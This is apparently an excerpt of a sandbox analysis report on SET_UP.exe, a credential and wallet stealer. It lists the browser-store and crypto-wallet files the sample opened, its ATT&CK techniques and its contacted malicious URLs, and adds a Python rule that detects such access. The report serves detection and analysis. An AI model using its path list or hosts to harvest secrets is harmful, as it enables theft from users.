              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
              Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\NIKHQAIQAU
              Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\WUTJSCBCFX
              Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\SQRKHNBNYN
              Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
              Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\NEBFQQYWPS
              Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
              Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\ZTGJILHXQB
              Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
              Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: number of queries: 1001 (the directories above were each queried repeatedly; repeated identical rows are collapsed)
              Source: Yara match | File source: 00000000.00000003.1988338849.000000000094D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1946741383.0000000000908000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: SET_UP.exe PID: 7268, type: MEMORYSTR
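The file-open entries above are the raw telemetry a stealer leaves behind: one process touching browser credential stores (Login Data, Cookies, key4.db, logins.json), the Local/Sync Extension Settings directories of dozens of extension IDs, and the data directories of desktop wallets, all within seconds. The detection below is an added example written for this page, not code from the Joe Sandbox report or from the LummaC sample; it turns that pattern into a rule and runs it over constructed Sysmon-style file-access events whose SET_UP.exe lines mirror the report's entries. The event line format, the 60-second window, the thresholds and the browser-process allowlist are assumptions for illustration. The key design point is that a browser legitimately reads its own stores, so no single category is an alert; the signal is one non-browser process crossing at least two categories.

```python
"""Added detection example for the stealer file-access pattern in the report above.
Not part of the Joe Sandbox report or of the analysed sample."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Artifact paths copied from the report's "File opened" entries, relative to AppData.
BROWSER_SECRET_FILES = {
    r"Google\Chrome\User Data\Default\Login Data", r"Google\Chrome\User Data\Default\Login Data For Account",
    r"Google\Chrome\User Data\Default\Network\Cookies", r"Google\Chrome\User Data\Default\Web Data",
    r"Google\Chrome\User Data\Default\History", r"Microsoft\Edge\User Data\Default\Login Data",
    r"Microsoft\Edge\User Data\Default\Login Data For Account", r"Microsoft\Edge\User Data\Default\Network\Cookies",
    r"Microsoft\Edge\User Data\Default\History",
}
FIREFOX_SECRET_FILES = {"key4.db", "logins.json", "cookies.sqlite", "cert9.db", "places.sqlite", "formhistory.sqlite"}
WALLET_DIRS = {
    r"Roaming\Exodus\exodus.wallet", r"Roaming\Ledger Live", r"Roaming\atomic\Local Storage\leveldb",
    r"Local\Coinomi\Coinomi\wallets", r"Roaming\Bitcoin\wallets", r"Roaming\Binance",
    r"Roaming\com.liberty.jaxx\IndexedDB", r"Roaming\Electrum\wallets", r"Roaming\Electrum-LTC\wallets",
    r"Roaming\Guarda\IndexedDB",
}
# Chromium extension storage: <profile>\Local|Sync Extension Settings\<id>. The report lists the IDs
# without naming the extensions, so any ID is matched (32 letters a-p; a few are 31 as extracted).
EXT_SETTINGS_RE = re.compile(r"\\User Data\\[^\\]+\\(?:Local|Sync) Extension Settings\\([a-p]{31,32})$", re.I)
# Browsers read their own stores all day; excluding them is a tuning assumption, not a report fact.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}


def classify(path):
    """Return (category, artifact) for a sensitive path, or None for anything else."""
    p = path.lower()
    m = EXT_SETTINGS_RE.search(path)
    if m:
        return "extension_storage", m.group(1).lower()
    for f in BROWSER_SECRET_FILES:
        if p.endswith(f.lower()):
            return "browser_secret", f
    base = p.rsplit("\\", 1)[-1]
    if "\\mozilla\\firefox\\profiles\\" in p and base in FIREFOX_SECRET_FILES:
        return "browser_secret", "firefox:" + base
    for d in WALLET_DIRS:
        if p.endswith(d.lower()) or (d.lower() + "\\") in p:
            return "wallet", d
    return None


def parse_events(text):
    """Parse constructed 'timestamp|image|path' lines (an assumed format, not the report's)."""
    events = []
    for line in text.strip().splitlines():
        ts, image, path = line.split("|", 2)
        events.append((datetime.fromisoformat(ts), image, path))
    return events


def find_stealer_activity(events, window=timedelta(seconds=60), min_categories=2, min_artifacts=5):
    """One alert per image whose sensitive opens, inside a sliding window, span at least
    min_categories kinds of secret and min_artifacts distinct artifacts."""
    per_image = defaultdict(list)
    for ts, image, path in events:
        if image.rsplit("\\", 1)[-1].lower() in BROWSER_IMAGES:
            continue
        hit = classify(path)
        if hit:
            per_image[image].append((ts, *hit))
    alerts = []
    for image, hits in per_image.items():
        hits.sort()
        for i, (start, _, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - start <= window]
            cats = {h[1] for h in in_window}
            arts = {h[2] for h in in_window}
            if len(cats) >= min_categories and len(arts) >= min_artifacts:
                alerts.append({"image": image, "first_seen": start, "categories": sorted(cats), "artifacts": len(arts)})
                break  # one alert per process is enough for triage
    return alerts


# Constructed sample events: a browser and a backup tool as benign noise, then SET_UP.exe
# opening a subset of the paths listed in the report.
SAMPLE_EVENTS = r"""
2025-01-06T10:00:01|C:\Program Files\Google\Chrome\Application\chrome.exe|C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
2025-01-06T10:00:02|C:\Program Files\Google\Chrome\Application\chrome.exe|C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
2025-01-06T10:00:07|C:\Tools\backup.exe|C:\Users\user\AppData\Roaming\Electrum\wallets
2025-01-06T10:01:00|C:\Users\user\Desktop\SET_UP.exe|C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
2025-01-06T10:01:01|C:\Users\user\Desktop\SET_UP.exe|C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
2025-01-06T10:01:02|C:\Users\user\Desktop\SET_UP.exe|C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
2025-01-06T10:01:03|C:\Users\user\Desktop\SET_UP.exe|C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
2025-01-06T10:01:04|C:\Users\user\Desktop\SET_UP.exe|C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
2025-01-06T10:01:05|C:\Users\user\Desktop\SET_UP.exe|C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
2025-01-06T10:01:06|C:\Users\user\Desktop\SET_UP.exe|C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
2025-01-06T10:01:07|C:\Users\user\Desktop\SET_UP.exe|C:\Users\user\AppData\Roaming\Electrum\wallets
2025-01-06T10:01:08|C:\Users\user\Desktop\SET_UP.exe|C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
"""

if __name__ == "__main__":
    for alert in find_stealer_activity(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

Run as-is, the only alert is for SET_UP.exe with all three categories and nine distinct artifacts; chrome.exe is skipped by the allowlist and backup.exe touches one artifact in one category, so neither fires. In production the same logic maps onto Sysmon Event ID 11 or an EDR file-access stream, and the extension-ID list from the report can be used to tighten the regex to known wallet extensions.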

              Remote Access Functionality

              Source: Yara match | File source: Process Memory Space: SET_UP.exe PID: 7268, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              MITRE ATT&CK Matrix

              The report's matrix (14 tactic columns, 6 technique rows) is listed here by tactic. A leading number on a technique is the report's signature counter, kept as extracted; techniques without one carried no counter in the report.

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
              Execution: 12 Windows Management Instrumentation; 12 Command and Scripting Interpreter; 2 PowerShell; Cron; Launchd; Scheduled Task
              Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Defense Evasion: 221 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
              Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
              Discovery: 211 Security Software Discovery; 1 Process Discovery; 221 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 32 System Information Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
              Collection: 41 Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
              Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Graph legend (graph image not included in this extraction): Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet

              No Antivirus matches
Source | Detection | Scanner | Label
https://klipvumisui.shop:443/int_clp_sha.txt | 100% | Avira URL Cloud | malware
skinfuzzerz.cyou | 0% | Avira URL Cloud | safe
https://skinfuzzerz.cyou/K | 0% | Avira URL Cloud | safe
https://skinfuzzerz.cyou/c | 0% | Avira URL Cloud | safe
https://skinfuzzerz.cyou/A | 0% | Avira URL Cloud | safe
https://skinfuzzerz.cyou/Y | 0% | Avira URL Cloud | safe
https://skinfuzzerz.cyou/RN | 0% | Avira URL Cloud | safe
https://skinfuzzerz.cyou/88q | 0% | Avira URL Cloud | safe
https://skinfuzzerz.cyou/ | 0% | Avira URL Cloud | safe
https://klipvumisui.shop/int_clp_sha.txtxe | 100% | Avira URL Cloud | malware
https://dfgh.onlin | 0% | Avira URL Cloud | safe
https://klipvumisui.shop/_B | 100% | Avira URL Cloud | malware
https://klipvumisui.shop/int_clp_sha.txtf1 | 100% | Avira URL Cloud | malware
https://klipvumisui.shop/Fi | 100% | Avira URL Cloud | malware
https://skinfuzzerz.cyou/s | 0% | Avira URL Cloud | safe
https://skinfuzzerz.cyou/api | 0% | Avira URL Cloud | safe
https://dfgh.online/ | 100% | Avira URL Cloud | malware
https://klipvumisui.shop/int_clp_sha.txter | 100% | Avira URL Cloud | malware
https://skinfuzzerz.cyou:443/api | 0% | Avira URL Cloud | safe
https://klipvumisui.shop/; | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cegu.shop | 185.161.251.21 | true | false | | high
skinfuzzerz.cyou | 188.114.97.3 | true | true | | unknown
241.42.69.40.in-addr.arpa | unknown | unknown | false | | high
dfgh.online | unknown | unknown | false | | high
klipvumisui.shop | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
skinfuzzerz.cyou | true | Avira URL Cloud: safe | unknown
rabidcowse.shop | false | | high
wholersorie.shop | false | | high
https://skinfuzzerz.cyou/api | true | Avira URL Cloud: safe | unknown
cloudewahsj.shop | false | | high
noisycuttej.shop | false | | high
nearycrepso.shop | false | | high
https://cegu.shop/8574262446/ph.txt | false | | high
framekgirus.shop | false | | high
tirepublicerj.shop | false | | high
abruptyopsn.shop | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://klipvumisui.shop:443/int_clp_sha.txt | SET_UP.exe, 00000000.00000003.2032852919.0000000000947000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000946000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://skinfuzzerz.cyou/ | SET_UP.exe, 00000000.00000003.1946741383.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1977857592.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1977322995.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1947405272.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1958611404.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1957838245.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1978395050.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1976505025.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1976948513.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1975769207.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973906418.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1976169185.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946456682.0000000003676000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2004113254.0000000000963000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://skinfuzzerz.cyou/A | SET_UP.exe, 00000000.00000003.1946540619.0000000003680000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipvumisui.shop/int_clp_sha.txtxe | SET_UP.exe, 00000000.00000002.2035710169.0000000000951000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000950000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://skinfuzzerz.cyou/88q | SET_UP.exe, 00000000.00000003.1957745990.0000000003687000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1958214464.000000000368B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2003997079.000000000368B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032739834.000000000368B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033008758.000000000368B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://skinfuzzerz.cyou/K | SET_UP.exe, 00000000.00000003.1946741383.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1947405272.0000000000964000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dfgh.online/invoker.php?compName= | powershell.exe, 00000004.00000002.2055826349.00000000030DB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | SET_UP.exe, 00000000.00000003.1922330613.0000000003712000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946395569.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1922484124.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946521144.00000000036C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.starfieldtech.com/0D | SET_UP.exe | false | | high
https://skinfuzzerz.cyou/RN | SET_UP.exe, 00000000.00000003.1946741383.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1947405272.0000000000964000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | SET_UP.exe | false | | high
https://skinfuzzerz.cyou/Y | SET_UP.exe, 00000000.00000003.2004113254.0000000000963000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000004.00000002.2056872307.0000000005111000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://skinfuzzerz.cyou/c | SET_UP.exe, 00000000.00000003.1958611404.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1957838245.0000000000964000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://klipvumisui.shop/_B | SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | SET_UP.exe, 00000000.00000003.1922484124.00000000036A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://dfgh.online | powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://klipvumisui.shop/int_clp_sha.txtf1 | SET_UP.exe, 00000000.00000002.2035748954.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.000000000095A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://dfgh.onlin | powershell.exe, 00000004.00000002.2064539599.0000000007732000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://dfgh.online/invoker.php?compname= | powershell.exe, 00000004.00000002.2056281293.0000000003447000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.starfieldtech.com/repository/sfsroot.crl0P | SET_UP.exe | false | | high
https://support.mozilla.org/products/firefoxgro.all | SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.2056872307.0000000005111000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://skinfuzzerz.cyou/s | SET_UP.exe, 00000000.00000003.1975769207.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973906418.0000000000963000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipvumisui.shop/int_clp_sha.txt | SET_UP.exe, SET_UP.exe, 00000000.00000002.2035748954.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035710169.0000000000951000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.000000000095A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000950000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035351543.000000000090D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.innosetup.com/ | SET_UP.exe | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000004.00000002.2056872307.0000000005907000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://klipvumisui.shop/Fi | SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ocsp.thawte.com0 | SET_UP.exe | false | | high
https://contoso.com/Icon | powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://klipvumisui.shop/int_clp_sha.txter | SET_UP.exe, 00000000.00000002.2035748954.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.000000000095A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | SET_UP.exe, 00000000.00000003.1922330613.0000000003712000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946395569.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1922484124.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946521144.00000000036C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://certificates.starfieldtech.com/repository/1604 | SET_UP.exe | false | | high
https://www.ecosia.org/newtab/ | SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.symauth.com/cps0( | SET_UP.exe | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://klipvumisui.shop/ | SET_UP.exe, SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://dfgh.online/ | SET_UP.exe | true | Avira URL Cloud: malware | unknown
https://klipvumisui.shop/; | SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.starfieldtech.com/repository/0 | SET_UP.exe | false | | high
http://www.symauth.com/rpa00 | SET_UP.exe | false | | high
https://dfgh.online/invoker.php?compName=user-PC | powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://skinfuzzerz.cyou:443/api | SET_UP.exe, 00000000.00000003.2004113254.000000000094F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.microsof | SET_UP.exe, 00000000.00000003.1922330613.0000000003714000.00000004.00000800.00020000.00000000.sdmp | false | | high
